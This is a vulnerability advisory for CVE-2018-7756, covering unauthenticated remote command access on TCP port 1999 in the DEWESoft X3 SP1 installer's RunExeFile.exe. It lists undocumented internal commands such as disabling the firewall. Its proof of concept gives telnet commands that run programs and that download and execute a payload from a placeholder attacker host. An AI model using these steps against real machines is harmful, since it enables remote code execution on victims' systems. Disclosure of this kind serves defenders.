DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access Vulnerability

[+] Credits: John Page (aka hyp3rlinx)

Vendor:
=============
www.dewesoft.com


Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe



Vulnerability Type:
===================
Remote Internal Command Access



CVE Reference:
==============
CVE-2018-7756



Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run 
a "SETFIREWALL Off" command. 

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.

Internal commands used by "RunExeFile.exe" for which I could not find any documentation.

RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE

Exploit/POC:
=============
TELNET x.x.x.x 1999 
RUN calc.exe

OR

Launch the victims browser and send them to website for a drive-by download etc.

TELNET x.x.x.x 1999 
RUN http://ATTACKER-IP/DOOM.exe

Then from the TELNET session execute it from Downloads directory.

runexe c:\Users\victim\Downloads\DOOM.exe

#  0day.today [2018-04-02]  #